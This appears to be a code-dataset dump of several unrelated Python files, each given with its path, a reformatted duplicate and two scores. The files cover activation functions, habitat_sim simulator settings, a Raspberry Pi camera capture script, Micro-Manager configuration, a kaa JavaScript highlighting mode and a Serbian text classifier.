        df(z)/dz = 1 if x > 0 else 0.01 (np.array)
    """
    # Delegates to the parametric derivative with the slope fixed at 0.01.
    return dfdz_PReLU(z, 0.01)
def PReLU(z, alpha):
    """Parametric ReLU: identity for positive z, slope `alpha` otherwise.

    Args:
        z (np.array)
        alpha: slope applied where z <= 0.

    Returns:
        f(z) = z if z > 0 else alpha * z (np.array)
    """
    return np.where(z > 0, z, alpha * z)
def dfdz_PReLU(z, alpha):
    """Derivative of the parametric rectified linear unit function...

    Args:
        z (np.array)
        alpha: slope used for the non-positive region.

    Returns:
        df(z)/dz = 1 if x > 0 else alpha (np.array)
    """
    # The two boolean masks are complementary, so exactly one branch
    # contributes per element (z == 0 gets alpha).
    return 1.0 * (z > 0) + alpha * (z <= 0) | 0.948155 | 0.761561 |
import habitat_sim
import habitat_sim.agent
# Baseline simulator settings; callers copy/override individual keys before
# passing the dict to make_cfg().
default_sim_settings = {
    # settings shared by example.py and benchmark.py
    "max_frames": 1000,
    "width": 640,
    "height": 480,
    "default_agent": 0,
    "sensor_height": 1.5,
    "color_sensor": True,  # RGB sensor (default: ON)
    "semantic_sensor": False,  # semantic sensor (default: OFF)
    "depth_sensor": False,  # depth sensor (default: OFF)
    "ortho_sensor": False,  # Orthographic RGB sensor (default: OFF)
    "seed": 1,
    "silent": False,  # do not print log info (default: OFF)
    # settings exclusive to example.py
    "save_png": False,  # save the pngs to disk (default: OFF)
    "print_semantic_scene": False,
    "print_semantic_mask_stats": False,
    "compute_shortest_path": False,
    "compute_action_shortest_path": False,
    "scene": "data/scene_datasets/habitat-test-scenes/skokloster-castle.glb",
    "test_scene_data_url": "http://dl.fbaipublicfiles.com/habitat/habitat-test-scenes.zip",
    "goal_position": [5.047, 0.199, 11.145],
    "enable_physics": False,
    "enable_gfx_replay_save": False,
    "physics_config_file": "./data/default.physics_config.json",
    "num_objects": 10,
    "test_object_index": 0,
    "frustum_culling": True,
}
# build SimulatorConfiguration
def make_cfg(settings):
sim_cfg = habitat_sim.SimulatorConfiguration()
if "frustum_culling" in settings:
sim_cfg.frustum_culling = settings["frustum_culling"]
else:
sim_cfg.frustum_culling = False
if "enable_physics" in settings:
sim_cfg.enable_physics = settings["enable_physics"]
if "physics_config_file" in settings:
sim_cfg.physics_config_file = settings["physics_config_file"]
if not settings["silent"]:
print("sim_cfg.physics_config_file = " + sim_cfg.physics_config_file)
if "scene_light_setup" in settings:
sim_cfg.scene_light_setup = settings["scene_light_setup"]
sim_cfg.gpu_device_id = 0
if not hasattr(sim_cfg, "scene_id"):
raise RuntimeError(
"Error: Please upgrade habitat-sim. SimulatorConfig API version mismatch"
)
sim_cfg.scene_id = settings["scene"]
# define default sensor parameters (see src/esp/Sensor/Sensor.h)
sensor_specs = []
if settings["color_sensor"]:
color_sensor_spec = habitat_sim.CameraSensorSpec()
color_sensor_spec.uuid = "color_sensor"
color_sensor_spec.sensor_type = habitat_sim.SensorType.COLOR
color_sensor_spec.resolution = [settings["height"], settings["width"]]
color_sensor_spec.position = [0, settings["sensor_height"], 0]
color_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(color_sensor_spec)
if settings["depth_sensor"]:
depth_sensor_spec = habitat_sim.CameraSensorSpec()
depth_sensor_spec.uuid = "depth_sensor"
depth_sensor_spec.sensor_type = habitat_sim.SensorType.DEPTH
depth_sensor_spec.resolution = [settings["height"], settings["width"]]
depth_sensor_spec.position = [0, settings["sensor_height"], 0]
depth_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(depth_sensor_spec)
if settings["semantic_sensor"]:
semantic_sensor_spec = habitat_sim.CameraSensorSpec()
semantic_sensor_spec.uuid = "semantic_sensor"
semantic_sensor_spec.sensor_type = habitat_sim.SensorType.SEMANTIC
semantic_sensor_spec.resolution = [settings["height"], settings["width"]]
semantic_sensor_spec.position = [0, settings["sensor_height"], 0]
semantic_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(semantic_sensor_spec)
if settings["ortho_sensor"]:
ortho_sensor_spec = habitat_sim.CameraSensorSpec()
ortho_sensor_spec.uuid = "ortho_sensor"
ortho_sensor_spec.sensor_type = habitat_sim.SensorType.COLOR
ortho_sensor_spec.resolution = [settings["height"], settings["width"]]
ortho_sensor_spec.position = [0, settings["sensor_height"], 0]
ortho_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.ORTHOGRAPHIC
sensor_specs.append(ortho_sensor_spec)
# create agent specifications
agent_cfg = habitat_sim.agent.AgentConfiguration()
agent_cfg.sensor_specifications = sensor_specs
agent_cfg.action_space = {
"move_forward": habitat_sim.agent.ActionSpec(
"move_forward", habitat_sim.agent.ActuationSpec(amount=0.25)
),
"turn_left": habitat_sim.agent.ActionSpec(
"turn_left", habitat_sim.agent.ActuationSpec(amount=10.0)
),
"turn_right": habitat_sim.agent.ActionSpec(
"turn_right", habitat_sim.agent.ActuationSpec(amount=10.0)
),
}
# override action space to no-op to test physics
if sim_cfg.enable_physics:
agent_cfg.action_space = {
"move_forward": habitat_sim.agent.ActionSpec(
"move_forward", habitat_sim.agent.ActuationSpec(amount=0.0)
)
}
return habitat_sim.Configuration(sim_cfg, [agent_cfg]) | examples/settings.py |
import habitat_sim
import habitat_sim.agent
default_sim_settings = {
# settings shared by example.py and benchmark.py
"max_frames": 1000,
"width": 640,
"height": 480,
"default_agent": 0,
"sensor_height": 1.5,
"color_sensor": True, # RGB sensor (default: ON)
"semantic_sensor": False, # semantic sensor (default: OFF)
"depth_sensor": False, # depth sensor (default: OFF)
"ortho_sensor": False, # Orthographic RGB sensor (default: OFF)
"seed": 1,
"silent": False, # do not print log info (default: OFF)
# settings exclusive to example.py
"save_png": False, # save the pngs to disk (default: OFF)
"print_semantic_scene": False,
"print_semantic_mask_stats": False,
"compute_shortest_path": False,
"compute_action_shortest_path": False,
"scene": "data/scene_datasets/habitat-test-scenes/skokloster-castle.glb",
"test_scene_data_url": "http://dl.fbaipublicfiles.com/habitat/habitat-test-scenes.zip",
"goal_position": [5.047, 0.199, 11.145],
"enable_physics": False,
"enable_gfx_replay_save": False,
"physics_config_file": "./data/default.physics_config.json",
"num_objects": 10,
"test_object_index": 0,
"frustum_culling": True,
}
# build SimulatorConfiguration
def make_cfg(settings):
sim_cfg = habitat_sim.SimulatorConfiguration()
if "frustum_culling" in settings:
sim_cfg.frustum_culling = settings["frustum_culling"]
else:
sim_cfg.frustum_culling = False
if "enable_physics" in settings:
sim_cfg.enable_physics = settings["enable_physics"]
if "physics_config_file" in settings:
sim_cfg.physics_config_file = settings["physics_config_file"]
if not settings["silent"]:
print("sim_cfg.physics_config_file = " + sim_cfg.physics_config_file)
if "scene_light_setup" in settings:
sim_cfg.scene_light_setup = settings["scene_light_setup"]
sim_cfg.gpu_device_id = 0
if not hasattr(sim_cfg, "scene_id"):
raise RuntimeError(
"Error: Please upgrade habitat-sim. SimulatorConfig API version mismatch"
)
sim_cfg.scene_id = settings["scene"]
# define default sensor parameters (see src/esp/Sensor/Sensor.h)
sensor_specs = []
if settings["color_sensor"]:
color_sensor_spec = habitat_sim.CameraSensorSpec()
color_sensor_spec.uuid = "color_sensor"
color_sensor_spec.sensor_type = habitat_sim.SensorType.COLOR
color_sensor_spec.resolution = [settings["height"], settings["width"]]
color_sensor_spec.position = [0, settings["sensor_height"], 0]
color_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(color_sensor_spec)
if settings["depth_sensor"]:
depth_sensor_spec = habitat_sim.CameraSensorSpec()
depth_sensor_spec.uuid = "depth_sensor"
depth_sensor_spec.sensor_type = habitat_sim.SensorType.DEPTH
depth_sensor_spec.resolution = [settings["height"], settings["width"]]
depth_sensor_spec.position = [0, settings["sensor_height"], 0]
depth_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(depth_sensor_spec)
if settings["semantic_sensor"]:
semantic_sensor_spec = habitat_sim.CameraSensorSpec()
semantic_sensor_spec.uuid = "semantic_sensor"
semantic_sensor_spec.sensor_type = habitat_sim.SensorType.SEMANTIC
semantic_sensor_spec.resolution = [settings["height"], settings["width"]]
semantic_sensor_spec.position = [0, settings["sensor_height"], 0]
semantic_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(semantic_sensor_spec)
if settings["ortho_sensor"]:
ortho_sensor_spec = habitat_sim.CameraSensorSpec()
ortho_sensor_spec.uuid = "ortho_sensor"
ortho_sensor_spec.sensor_type = habitat_sim.SensorType.COLOR
ortho_sensor_spec.resolution = [settings["height"], settings["width"]]
ortho_sensor_spec.position = [0, settings["sensor_height"], 0]
ortho_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.ORTHOGRAPHIC
sensor_specs.append(ortho_sensor_spec)
# create agent specifications
agent_cfg = habitat_sim.agent.AgentConfiguration()
agent_cfg.sensor_specifications = sensor_specs
agent_cfg.action_space = {
"move_forward": habitat_sim.agent.ActionSpec(
"move_forward", habitat_sim.agent.ActuationSpec(amount=0.25)
),
"turn_left": habitat_sim.agent.ActionSpec(
"turn_left", habitat_sim.agent.ActuationSpec(amount=10.0)
),
"turn_right": habitat_sim.agent.ActionSpec(
"turn_right", habitat_sim.agent.ActuationSpec(amount=10.0)
),
}
# override action space to no-op to test physics
if sim_cfg.enable_physics:
agent_cfg.action_space = {
"move_forward": habitat_sim.agent.ActionSpec(
"move_forward", habitat_sim.agent.ActuationSpec(amount=0.0)
)
}
return habitat_sim.Configuration(sim_cfg, [agent_cfg]) | 0.655557 | 0.330809 |
import os,sys,tty,termios
from datetime import datetime
from rpi.inputs import *
from rpi.camerainfo import *
ESC=27
ENTER=13
SPACE=32
exposure=1
framenumber=1
frame_default=1
digits=4
digits_default=4
quality_default=90
artist=""
artistfile="artist.txt"
# Uncomment to overide red and blue gains
# Calibration gains for Manfrotto Lumie LEDs
#awbg_red=1.6
#awbg_blue=1.4
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
def getch():
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd,termios.TCSADRAIN,old_settings)
return ch
print("Raspberry Pi capture pictures")
print("")
if camera_detected==0:
print("Raspberry Pi camera module not found!")
exit(0)
quality_default=90
quality=inputValue("image quality",1,100,quality_default,"","Value out of range!",True)
print("\nList disk and partitions:")
os.system('lsblk')
print("\nCurrent directory:")
os.system("pwd")
path=input('\nPath to images (current directory: <Enter>): ')
name=input('Project name (default=pic: <Enter>): ')
iso=100
iso_default=100
iso_modes=[100,200,320,400,500,640,800]
iso=inputListValue("ISO",iso_modes,iso_default,"Not a valid ISO value!",False)
print("")
# Exposure unit: µs
exp_min=1
exp_max=330000
exp_default=2000
exposure=inputValue("exposure time",exp_min,exp_max,exp_default,"µs","Exposure is out of range!",True)
# Gain value: 1.0 to 12.0 for the IMX219 sensor on Camera Module V2
print("")
awb_on="n"
default_awb="y"
awb_on=inputYesNo("AWB","AWB mode on",default_awb)
if awb_on=="n":
print("")
awbg_red=inputValue("red gain",1.0,8.0,awbg_red,"","Value out of range!",False)
awbg_blue=inputValue("blue gain",1.0,8.0,awbg_blue,"","Value out of range!",False)
# Digits
min_digits=len(str(framenumber))
max_digits=8
if min_digits>digits_default:
digits_default=min_digits
print("")
digits=inputValue("digits",min_digits,max_digits,digits_default,"","Digits is out of range!",True)
# Start frame
frame_min=1
frame_max=10**digits-1
frame_default=1
framenumber=inputValue("first frame",frame_min,frame_max,frame_default,"","Frame number is out of range!")
# Create a log file
logname=""
if (path!=""):
logname=path+"/"
artistfile=path+"/"+artistfile
if name=="":
name="pic"
logname+=name+".log"
now = datetime.now()
dt_string = now.strftime("%Y.%m.%d-%H:%M:%S")
file=open(logname,"w")
file.write("Log created on "+dt_string+"\n\n")
if (path!=""):
file.write("File path: "+path+"\n\n")
else:
file.write("File path: Not defined\n\n")
try:
f=open(artistfile,"r")
artist=f.readline()
artist=artist.strip()
print("Artist: "+artist)
f.close()
except IOError:
artist=""
# print("No artist.txt file")
print("")
quick_preview=inputYesNo("quick preview","Quick preview mode","y")
if artist!="":
file.write("Artist: "+artist+"\n")
file.write("Capture pictures parameters:\n")
file.write("Resolution: "+str(camera_maxx)+"x"+str(camera_maxy)+"\n")
file.write("Sensor: "+camera_revision+"\n")
file.write("Quality: "+str(quality)+"\n")
file.write("ISO value: "+str(iso)+"\n")
file.write("Exposure: "+str(exposure)+" µs\n")
file.write("AWB mode: ")
if awb_on=="y":
file.write("Enabled\n")
else:
file.write("Disabled\n")
file.write("Red gain: "+str(awbg_red)+"\n")
file.write("Blue gain: "+str(awbg_blue)+"\n")
file.write("Digits: "+str(digits)+"\n")
file.write("Start frame: "+str(framenumber)+"\n")
file.write("First file name: "+name+"_"+str(framenumber).rjust(digits,'0')+".png\n\n")
print("\nStart capturing images: ENTER")
print("Capture image: SPACE")
print("Exit program: ESC\n")
while True:
ch=getch()
if ch==chr(ENTER):
print("Capture mode enabled.")
break
if ch==chr(ESC):
file.close()
sys.exit()
while framenumber<10**digits:
ch=getch()
if ch==chr(SPACE):
fname=name+"_"+str(framenumber).rjust(digits,'0')
print(fname)
framenumber+=1
tmp="raspistill "
if quick_preview=="n":
tmp+="-n "
tmp+="-t 1 "
tmp+="-ISO "+str(iso)+" "
tmp+="-q "
tmp+=str(quality)+" "
tmp+="-ss "+str(exposure)+" "
# tmp+="-ex off "
#tmp+="-bm -drc high "
if awb_on=="n":
tmp+="-awb off -awbg "+str(awbg_red)+","+str(awbg_blue)+" "
if artist!="":
tmp+='-x IFD0.Artist="'+artist+'" '
tmp+='-x IFD0.Copyright="'+artist+'" '
if (path!=""):
tmp+='-o '+path+'/'+fname
else:
tmp+='-o '+fname
tmp=tmp+".png"
os.system(tmp)
file.write(tmp+"\n")
if ch==chr(ESC):
break
file.close() | python/capturepics.py |
import os,sys,tty,termios
from datetime import datetime
from rpi.inputs import *
from rpi.camerainfo import *
ESC=27
ENTER=13
SPACE=32
exposure=1
framenumber=1
frame_default=1
digits=4
digits_default=4
quality_default=90
artist=""
artistfile="artist.txt"
# Uncomment to overide red and blue gains
# Calibration gains for Manfrotto Lumie LEDs
#awbg_red=1.6
#awbg_blue=1.4
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
def getch():
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd,termios.TCSADRAIN,old_settings)
return ch
print("Raspberry Pi capture pictures")
print("")
if camera_detected==0:
print("Raspberry Pi camera module not found!")
exit(0)
quality_default=90
quality=inputValue("image quality",1,100,quality_default,"","Value out of range!",True)
print("\nList disk and partitions:")
os.system('lsblk')
print("\nCurrent directory:")
os.system("pwd")
path=input('\nPath to images (current directory: <Enter>): ')
name=input('Project name (default=pic: <Enter>): ')
iso=100
iso_default=100
iso_modes=[100,200,320,400,500,640,800]
iso=inputListValue("ISO",iso_modes,iso_default,"Not a valid ISO value!",False)
print("")
# Exposure unit: µs
exp_min=1
exp_max=330000
exp_default=2000
exposure=inputValue("exposure time",exp_min,exp_max,exp_default,"µs","Exposure is out of range!",True)
# Gain value: 1.0 to 12.0 for the IMX219 sensor on Camera Module V2
print("")
awb_on="n"
default_awb="y"
awb_on=inputYesNo("AWB","AWB mode on",default_awb)
if awb_on=="n":
print("")
awbg_red=inputValue("red gain",1.0,8.0,awbg_red,"","Value out of range!",False)
awbg_blue=inputValue("blue gain",1.0,8.0,awbg_blue,"","Value out of range!",False)
# Digits
min_digits=len(str(framenumber))
max_digits=8
if min_digits>digits_default:
digits_default=min_digits
print("")
digits=inputValue("digits",min_digits,max_digits,digits_default,"","Digits is out of range!",True)
# Start frame
frame_min=1
frame_max=10**digits-1
frame_default=1
framenumber=inputValue("first frame",frame_min,frame_max,frame_default,"","Frame number is out of range!")
# Create a log file
logname=""
if (path!=""):
logname=path+"/"
artistfile=path+"/"+artistfile
if name=="":
name="pic"
logname+=name+".log"
now = datetime.now()
dt_string = now.strftime("%Y.%m.%d-%H:%M:%S")
file=open(logname,"w")
file.write("Log created on "+dt_string+"\n\n")
if (path!=""):
file.write("File path: "+path+"\n\n")
else:
file.write("File path: Not defined\n\n")
try:
f=open(artistfile,"r")
artist=f.readline()
artist=artist.strip()
print("Artist: "+artist)
f.close()
except IOError:
artist=""
# print("No artist.txt file")
print("")
quick_preview=inputYesNo("quick preview","Quick preview mode","y")
if artist!="":
file.write("Artist: "+artist+"\n")
file.write("Capture pictures parameters:\n")
file.write("Resolution: "+str(camera_maxx)+"x"+str(camera_maxy)+"\n")
file.write("Sensor: "+camera_revision+"\n")
file.write("Quality: "+str(quality)+"\n")
file.write("ISO value: "+str(iso)+"\n")
file.write("Exposure: "+str(exposure)+" µs\n")
file.write("AWB mode: ")
if awb_on=="y":
file.write("Enabled\n")
else:
file.write("Disabled\n")
file.write("Red gain: "+str(awbg_red)+"\n")
file.write("Blue gain: "+str(awbg_blue)+"\n")
file.write("Digits: "+str(digits)+"\n")
file.write("Start frame: "+str(framenumber)+"\n")
file.write("First file name: "+name+"_"+str(framenumber).rjust(digits,'0')+".png\n\n")
print("\nStart capturing images: ENTER")
print("Capture image: SPACE")
print("Exit program: ESC\n")
while True:
ch=getch()
if ch==chr(ENTER):
print("Capture mode enabled.")
break
if ch==chr(ESC):
file.close()
sys.exit()
while framenumber<10**digits:
ch=getch()
if ch==chr(SPACE):
fname=name+"_"+str(framenumber).rjust(digits,'0')
print(fname)
framenumber+=1
tmp="raspistill "
if quick_preview=="n":
tmp+="-n "
tmp+="-t 1 "
tmp+="-ISO "+str(iso)+" "
tmp+="-q "
tmp+=str(quality)+" "
tmp+="-ss "+str(exposure)+" "
# tmp+="-ex off "
#tmp+="-bm -drc high "
if awb_on=="n":
tmp+="-awb off -awbg "+str(awbg_red)+","+str(awbg_blue)+" "
if artist!="":
tmp+='-x IFD0.Artist="'+artist+'" '
tmp+='-x IFD0.Copyright="'+artist+'" '
if (path!=""):
tmp+='-o '+path+'/'+fname
else:
tmp+='-o '+fname
tmp=tmp+".png"
os.system(tmp)
file.write(tmp+"\n")
if ch==chr(ESC):
break
file.close() | 0.07817 | 0.085786 |
import MMCorePy
def cat(config):
"""Concatenate config."""
return '\n'.join(config.getVerbose().split('<br>'))
devlabel = 'Camera'
DEVICE = [devlabel, 'DemoCamera', 'DCam']
# DEVICE = [devlabel, 'OpenCVgrabber', 'OpenCVgrabber']
# DEVICE = [devlabel, "BaumerOptronic", "BaumerOptronic"]
mmc = MMCorePy.CMMCore()
# mmc.enableStderrLog(False)
# mmc.enableDebugLog(False)
mmc.loadDevice(*DEVICE)
mmc.initializeAllDevices()
mmc.setCameraDevice(devlabel)
# GROUP CONTAINS CONFIGS (PRESETS).
# Creates an empty configuration group. Not really needed.
# mmc.defineConfigGroup("groupName")
# Defines a configuration. Without error creates config.
# mmc.defineConfig('groupName', 'configName')
# Defines a single configuration entry. Without error creates config.
mmc.defineConfig('groupName', 'configName', devlabel, 'Exposure', '30')
# mmc.loadSystemConfiguration("MMConfig.cfg")
# INSPECT CONFIGURATION
print('getAvailableConfigGroups', mmc.getAvailableConfigGroups())
if mmc.isGroupDefined('groupName'):
print('getAvailableConfigs', mmc.getAvailableConfigs('groupName'))
print('getConfigGroupState', cat(mmc.getConfigGroupState('groupName')))
if mmc.isConfigDefined('groupName', 'configName'):
print('getConfigState', cat(mmc.getConfigState('groupName', 'configName')))
# CONTROL
print('')
print('getProperty', mmc.getProperty(devlabel, 'Exposure'))
# Apply config to group
mmc.setConfig('groupName', 'configName')
print('getProperty', mmc.getProperty(devlabel, 'Exposure'))
# Smt weird
# print('getCurrentConfig', mmc.getCurrentConfig('groupName'))
# ***
# mmc.setPixelSizeUm(const char *resolutionID, double pixSize)
# mmc.setPixelSizeUm('resolutionID', 0.1)
# mmc.setPixelSizeConfig(const char *resolutionID)
print('')
print('getAvailablePixelSizeConfigs', mmc.getAvailablePixelSizeConfigs())
print('getPixelSizeUm', mmc.getPixelSizeUm()) # (based on getMagnificationFactor)
# print('getSystemState %s' % '\n'.join(mmc.getSystemState().getVerbose().split('<br>')))
# Property,Core,Initialize,0
mmc.saveSystemConfiguration("MMConfig.cfg") | mm_configuration/mm_config_manual.py | import MMCorePy
def cat(config):
"""Concatenate config."""
return '\n'.join(config.getVerbose().split('<br>'))
devlabel = 'Camera'
DEVICE = [devlabel, 'DemoCamera', 'DCam']
# DEVICE = [devlabel, 'OpenCVgrabber', 'OpenCVgrabber']
# DEVICE = [devlabel, "BaumerOptronic", "BaumerOptronic"]
mmc = MMCorePy.CMMCore()
# mmc.enableStderrLog(False)
# mmc.enableDebugLog(False)
mmc.loadDevice(*DEVICE)
mmc.initializeAllDevices()
mmc.setCameraDevice(devlabel)
# GROUP CONTAINS CONFIGS (PRESETS).
# Creates an empty configuration group. Not really needed.
# mmc.defineConfigGroup("groupName")
# Defines a configuration. Without error creates config.
# mmc.defineConfig('groupName', 'configName')
# Defines a single configuration entry. Without error creates config.
mmc.defineConfig('groupName', 'configName', devlabel, 'Exposure', '30')
# mmc.loadSystemConfiguration("MMConfig.cfg")
# INSPECT CONFIGURATION
print('getAvailableConfigGroups', mmc.getAvailableConfigGroups())
if mmc.isGroupDefined('groupName'):
print('getAvailableConfigs', mmc.getAvailableConfigs('groupName'))
print('getConfigGroupState', cat(mmc.getConfigGroupState('groupName')))
if mmc.isConfigDefined('groupName', 'configName'):
print('getConfigState', cat(mmc.getConfigState('groupName', 'configName')))
# CONTROL
print('')
print('getProperty', mmc.getProperty(devlabel, 'Exposure'))
# Apply config to group
mmc.setConfig('groupName', 'configName')
print('getProperty', mmc.getProperty(devlabel, 'Exposure'))
# Smt weird
# print('getCurrentConfig', mmc.getCurrentConfig('groupName'))
# ***
# mmc.setPixelSizeUm(const char *resolutionID, double pixSize)
# mmc.setPixelSizeUm('resolutionID', 0.1)
# mmc.setPixelSizeConfig(const char *resolutionID)
print('')
print('getAvailablePixelSizeConfigs', mmc.getAvailablePixelSizeConfigs())
print('getPixelSizeUm', mmc.getPixelSizeUm()) # (based on getMagnificationFactor)
# print('getSystemState %s' % '\n'.join(mmc.getSystemState().getVerbose().split('<br>')))
# Property,Core,Initialize,0
mmc.saveSystemConfiguration("MMConfig.cfg") | 0.520253 | 0.087175 |
import re
from kaa.filetype.default import defaultmode
from kaa.syntax_highlight import *
JavaScriptThemes = {
'basic': [],
}
KEYWORDS = ["break", "case", "catch", "continue", "debugger", "default",
"delete", "do", "else", "finally", "for", "function", "if", "in",
"instanceof", "new", "return", "switch", "this", "throw", "try",
"typeof", "var", "void", "while", "with", "class", "enum", "export",
"extends", "import", "super", "implements", "interface", "let",
"package", "private", "protected", "public", "static", "yield", ]
class Regex(Span):
RE_ENDOFTERM = re.compile(r'[a-zA-Z0-9.)]')
def _is_regex(self, doc, pos):
comments = (self.tokenizer.tokens.comment1,
self.tokenizer.tokens.comment2)
not_terms = (self.tokenizer.tokens.keyword,)
while pos > 0:
pos -= 1
token = self.tokenizer.get_token_at(doc, pos)
if token.tokenizer is not self.tokenizer:
break
top = token.get_token_begin(doc, pos)
# skip comment token
if token in comments:
pos = top
continue
# check if prev token is keywords
if token in not_terms:
break
s = doc.gettext(top, pos + 1).strip()
# skip white-space
if not s:
pos = top
continue
# check if last token is term or closing parenthesis
m = self.RE_ENDOFTERM.match(s[-1])
if not m:
break
# last token is term(literal, variable, expr, ...)
return False
return True
def on_start(self, doc, match):
pos = match.start()
if self._is_regex(doc, pos):
ret = yield from super().on_start(doc, match)
return ret
else:
# This / is divide operator
yield (pos, pos + 1, self.tokenizer.styleid_default)
return pos + 1, False
return ret
def javascript_tokens():
return (
("comment1", Span('comment', r'/\*', '\*/', escape='\\')),
("comment2", Span('comment', r'//', '$', escape='\\')),
("keyword", Keywords('keyword', KEYWORDS)),
("number", SingleToken('number',
[r'\b[0-9]+(\.[0-9]*)*\b', r'\b\.[0-9]+\b'])),
("regex", Regex('string', r'/', r'/\w*', escape='\\')),
("string1", Span('string', '"', '"', escape='\\')),
("string2", Span('string', "'", "'", escape='\\')),
)
def make_tokenizer():
return Tokenizer(tokens=javascript_tokens())
class JavaScriptMode(defaultmode.DefaultMode):
MODENAME = 'JavaScript'
tokenizer = make_tokenizer()
def init_themes(self):
super().init_themes()
self.themes.append(JavaScriptThemes) | kaa/filetype/javascript/javascriptmode.py | import re
from kaa.filetype.default import defaultmode
from kaa.syntax_highlight import *
JavaScriptThemes = {
'basic': [],
}
KEYWORDS = ["break", "case", "catch", "continue", "debugger", "default",
"delete", "do", "else", "finally", "for", "function", "if", "in",
"instanceof", "new", "return", "switch", "this", "throw", "try",
"typeof", "var", "void", "while", "with", "class", "enum", "export",
"extends", "import", "super", "implements", "interface", "let",
"package", "private", "protected", "public", "static", "yield", ]
class Regex(Span):
RE_ENDOFTERM = re.compile(r'[a-zA-Z0-9.)]')
def _is_regex(self, doc, pos):
comments = (self.tokenizer.tokens.comment1,
self.tokenizer.tokens.comment2)
not_terms = (self.tokenizer.tokens.keyword,)
while pos > 0:
pos -= 1
token = self.tokenizer.get_token_at(doc, pos)
if token.tokenizer is not self.tokenizer:
break
top = token.get_token_begin(doc, pos)
# skip comment token
if token in comments:
pos = top
continue
# check if prev token is keywords
if token in not_terms:
break
s = doc.gettext(top, pos + 1).strip()
# skip white-space
if not s:
pos = top
continue
# check if last token is term or closing parenthesis
m = self.RE_ENDOFTERM.match(s[-1])
if not m:
break
# last token is term(literal, variable, expr, ...)
return False
return True
def on_start(self, doc, match):
pos = match.start()
if self._is_regex(doc, pos):
ret = yield from super().on_start(doc, match)
return ret
else:
# This / is divide operator
yield (pos, pos + 1, self.tokenizer.styleid_default)
return pos + 1, False
return ret
def javascript_tokens():
return (
("comment1", Span('comment', r'/\*', '\*/', escape='\\')),
("comment2", Span('comment', r'//', '$', escape='\\')),
("keyword", Keywords('keyword', KEYWORDS)),
("number", SingleToken('number',
[r'\b[0-9]+(\.[0-9]*)*\b', r'\b\.[0-9]+\b'])),
("regex", Regex('string', r'/', r'/\w*', escape='\\')),
("string1", Span('string', '"', '"', escape='\\')),
("string2", Span('string', "'", "'", escape='\\')),
)
def make_tokenizer():
return Tokenizer(tokens=javascript_tokens())
class JavaScriptMode(defaultmode.DefaultMode):
MODENAME = 'JavaScript'
tokenizer = make_tokenizer()
def init_themes(self):
super().init_themes()
self.themes.append(JavaScriptThemes) | 0.309754 | 0.188473 |
import csv
import keras
import numpy as np
import matplotlib.pyplot as plt
from SerbianStemmer import stem_sentence
def clean_word(word):
word = word.lower()
word = word.replace("š", "sx")
word = word.replace("č", "cx")
word = word.replace("ć", "cy")
word = word.replace("đ", "dx")
word = word.replace("ž", "zx")
return "".join(filter(str.isalnum, word))
def read_dictionary(word_count):
word_list = []
with open("word_dictionary.txt", "r", encoding="utf-8") as file:
for index, line in enumerate(file):
word, count = line.split()
word_list.append(word)
if index + 1>= word_count:
break
word_dictionary = {}
for index, word in enumerate(word_list):
word_dictionary[word] = index
return word_dictionary
def one_hot(story, word_dictionary):
encoded_story = np.zeros(len(word_dictionary), dtype=np.int8)
word_list = list(map(clean_word, story.split()))
word_list = stem_sentence(word_list)
for word in word_list:
if word not in word_dictionary:
continue
index = word_dictionary[word]
encoded_story[index] += 1
return encoded_story
def read_stories():
data = []
labels = []
with open('ispovesti.csv', encoding='utf-8') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
data.append(row[0])
likes = float(row[1])
dislikes = float(row[2])
if likes > dislikes:
labels.append(1)
else:
labels.append(0)
return data, labels
word_dictionary = read_dictionary(5000)
data, labels = read_stories()
encoded_data = np.array([one_hot(x, word_dictionary) for x in data])
labels = np.array(labels)
split = int(encoded_data.shape[0] * 0.85)
train_data = encoded_data[0:split, :]
train_labels = labels[0:split]
test_data = encoded_data[split:, :]
test_labels = labels[split:]
input_size = len(word_dictionary)
model = keras.Sequential()
model.add(keras.layers.InputLayer(input_shape=(input_size,)))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(1, activation='sigmoid'))
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=['accuracy'])
model.summary()
history = model.fit(train_data, train_labels, validation_split=0.1, batch_size=128, epochs=6)
score = model.evaluate(test_data, test_labels)
#print("Test accuracy:", score)
#print(history.history.keys())
komentari = [
"Imam najljepsu mater na svetu.",
"Prevario sam ženu.",
"Prevarila sam dečka.",
"Joj kako ne mogu kada mi u kafanu dođe dijaspora pa se nešta pravi kao da je neko i nešta."
]
test = np.array([one_hot(x, word_dictionary) for x in komentari])
predictions = model.predict(test)
print(predictions)
for prediction in predictions:
if prediction[0]>= 0.5:
print("Ispovijest ima pozitivan sadrzaj")
else:
print("Ispovijest ima negativan sadrzaj") | classification.py | import csv
import keras
import numpy as np
import matplotlib.pyplot as plt
from SerbianStemmer import stem_sentence
def clean_word(word):
word = word.lower()
word = word.replace("š", "sx")
word = word.replace("č", "cx")
word = word.replace("ć", "cy")
word = word.replace("đ", "dx")
word = word.replace("ž", "zx")
return "".join(filter(str.isalnum, word))
def read_dictionary(word_count):
word_list = []
with open("word_dictionary.txt", "r", encoding="utf-8") as file:
for index, line in enumerate(file):
word, count = line.split()
word_list.append(word)
if index + 1>= word_count:
break
word_dictionary = {}
for index, word in enumerate(word_list):
word_dictionary[word] = index
return word_dictionary
def one_hot(story, word_dictionary):
encoded_story = np.zeros(len(word_dictionary), dtype=np.int8)
word_list = list(map(clean_word, story.split()))
word_list = stem_sentence(word_list)
for word in word_list:
if word not in word_dictionary:
continue
